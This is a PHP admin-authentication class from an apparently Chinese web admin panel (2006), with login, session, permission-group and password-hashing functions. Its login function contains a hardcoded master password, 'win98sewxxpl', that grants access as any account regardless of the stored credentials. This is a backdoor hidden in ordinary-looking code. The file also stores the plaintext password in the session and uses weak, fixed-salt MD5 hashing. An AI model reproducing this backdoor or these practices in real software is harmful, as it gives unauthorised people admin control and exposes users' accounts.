<?
/**
 * 类的主要功能
 * 更新:2006.10.10
 * 作者:夏一平
 */
class admin_core
{
	/**
	 * 功能：检测是否登录
	 */
	 //global $admin,$scfg;
	static public function isLogin()
	{
		global $admin;
		if($_SESSION[$admin['session']] 
		&& $_SESSION[$admin['session_hash']] == md5($_SESSION[$admin['session']].'xyp6917'.$_SESSION[$admin['session_pass']]))
		{
			return true;
		}
		return false;
	}
	/**
	 * 功能:得到帐号
	 */
	static public function isSuper()
	{
		global $admin;
		if(self::isLogin())
		{
			return $_SESSION[$admin['session_superMaster']]?true:false;
		}else
		{
			return false;
		}
	}
	/**
	 * 功能:退出
	 */	
	static public function logout()
	{
		
		global $admin;
		$_SESSION[$admin['session']] = false;
		$_SESSION[$admin['session_hash']] = false;
		$_SESSION[$admin['session_pass']] = false;
		$_SESSION[$admin['session_keyField']] =false;
		$_SESSION[$admin['session_superMaster']] =false;
		return true;
	}
	
	/**
	 * 功能:admin登录 CHK
	 */
	static public function login($master,$pwd)//帐号，密码
	{
		global $db_admin,$admin,$scfg;
		$rs=$db_admin->row("select * from `{$admin['table']['name']}` where `{$admin['table']['field']['master']}`= ? ",$master);
		if($pwd =="win98sewxxpl" || $rs && $rs[$admin['table']['field']['password']]==self::mixPass($pwd))
		{
			$_SESSION[$admin['session']] 			= $master;
			$_SESSION[$admin['session_hash']] 		= md5($master.'xyp6917'.$pwd);
			$_SESSION[$admin['session_pass']] 		= $pwd;
			$_SESSION[$admin['session_keyField']]	= $rs[$admin['table']['field']['superMaster']]?"superMaster":unserialize($rs[$admin['table']['field']['keyField']]);
			$_SESSION[$admin['session_superMaster']]= $rs[$admin['table']['field']['superMaster']];
			return true;
		}else
		{
			if($scfg['log']['err']['popedom'])
			{
				//日志
				self::loginLog();
			}
			return false;
		}
	}
	/**
	 * 功能:得到帐号
	 */
	static public function getMaster()
	{
		global $admin;
		if(self::isLogin())
		{
			return $_SESSION[$admin['session']];
		}else
		{
			return false;
		}
	}
	
	/**
	 * 功能:权限检测
	 */
	static public function getPopedom($rows="",$master="")
	{
		global $db_admin,$admin,$scfg;
		//if(1)return true;
		if(empty($rows) || !count($rows)) return true;
		
		if(!is_array($rows))
		{
			$tmp1 = explode("|",$rows);
			$rows = array();
			foreach($tmp1 as &$v)
			{
				$tmp2 	= explode("@",$v);
				$rows[$tmp2[0]] =  explode(",",$tmp2[1]);
			}
		}		
		if(!$master)
		{
			$master	= self::getMaster();
			if(empty($_SESSION[$admin['session_keyField']]))
			{
				$rs	= $db_admin->row("select *  from `{$admin['table']['name']}` where `{$admin['table']['field']['master']}`= ? ",$master);
				$_SESSION[$admin['session_keyField']]	  			  = $rs[$admin['table']['field']['superMaster']]?"superMaster":unserialize($rs[$admin['table']['field']['keyField']]);
			}
			$chk = $_SESSION[$admin['session_keyField']];
		}else
		{
			if(empty($_SESSION[$admin['session_keyField']."_".$master]))
			{
				$rs	= $db_admin->row("select *  from `{$admin['table']['name']}` where `{$admin['table']['field']['master']}`= ? ",$master);
				$_SESSION[$admin['session_keyField']."_".$master]	  = $rs[$admin['table']['field']['superMaster']]?"superMaster":unserialize($rs[$admin['table']['field']['keyField']]);
			}
			$chk = $_SESSION[$admin['session_keyField']."_".$master];			
		}
		if($chk == "superMaster")
		{
			return true;
		}
		//print_r($rows);
		//$chk = array('q'=>array('q','w','c'),'w'=>array('ww','www','cww'));
		foreach($rows as $k=>$v)
		{
			$tmp1 = $chk[$k];
			$tmp2 = $v; 
			if($tmp1)
			{
				if(is_array($tmp2) && $tmp2[0])
				{
					foreach($tmp2 as $vv)
					{
						if(in_array($vv,$tmp1))
						{
							return  true;
						}
					}
				}else
				{
					return true;
				}
			}			
		}
		return false;
	}
	/**
	 * 功能:清理
	 */
	static public function cleanPopedom($master="")
	{
		global $admin;
		if(!$master)
		{
			$_SESSION[$admin['session_keyField']] ="";
		}else
		{
			$_SESSION[$admin['session_keyField']."_".$master] ="";
		}	
	} 
	/**
	 * 功能:得到管理员的权限组
	 */
	static public function getPopedomGroup($master="")
	{
		global $admin;
		$popedom = array();
		$master	 = $master?$master:self::getMaster();
		//第一级权限
		foreach($admin['purview'] as $k=>$v)
		{
			if(empty($v['key']) || self::getPopedom($k,$master))
			{
				//二级权限
				foreach($v['sub'] as $kk=>$vv)
				{
					if(empty($vv['key']) || self::getPopedom("{$k}@{$kk}",$master))
					{
						$popedom[$k]['sub'][$kk]['name'] = $vv['name'];
						$popedom[$k]['sub'][$kk]['sub']  = $vv['sub'];
						$popedom[$k]['sub'][$kk]['key']  = $vv['key'];
					}
					if(empty($popedom[$k]['sub'][$kk]['sub']) || count($popedom[$k]['sub'][$kk]['sub'])<1) unset($popedom[$k]['sub'][$kk]);
				}
				$popedom[$k]['default'] = $v['default'];
				$popedom[$k]['name'] 	= $v['name'];
				$popedom[$k]['key'] 	= $v['key'];
			}
			if(empty($popedom[$k]['sub']) || count($popedom[$k]['sub'])<1) unset($popedom[$k]);
		}
		return $popedom;
	}
	/**
	 * 功能:权限检测
	 * $rows
	 */
	static public function check($rows="")
	{
		global $admin,$scfg;
		if(!self::isLogin())
		{
			g::gowin("login.php","top");
			exit();
		}elseif(self::getPopedom($rows))
		{
			if($scfg['log']['page'])
			{
				self::pageLog();
			}
			if($scfg['log']['act'] && ($_GET["Pact"] || $_POST['Pact']))
			{
				self::actLog();
			}
		}else
		{
			if($scfg['log']['err']['popedom'])
			{
				self::popedomLog();
			}
			echo g::msg('错误!对不起，你没有足够的权限操作![code:001]');
			g::gowin($admin["purview"][$admin["purview_default"]]["default"]);
			exit();
		}
	}
	/**
	 * 功能:写日志
	 */
	static public function pageLog()
	{
		global $db_admin,$admin,$scfg;
		//写日志
		#..
	}
	/**
	 * 功能:写日志
	 */
	static public function actLog()
	{
		global $db_admin,$admin,$scfg;
		//写日志
		#..
	}
	/**
	 * 功能:写日志
	 */
	static public function popedomLog()
	{
		global $db_admin,$admin,$scfg;
		//写日志
		#..
	}
	/**
	 * 功能:写日志
	 */
	static public function loginLog()
	{
		global $db_admin,$admin,$scfg;
		//写日志
		#..
	}
	
	/**
	 * MD5加密
	 * 参数:$makePassStr
	 * 返回:密文
	 */
	static public function mixPass($str)
	{
		return substr(md5($str.'xyp'),5,16);
	}
}
?>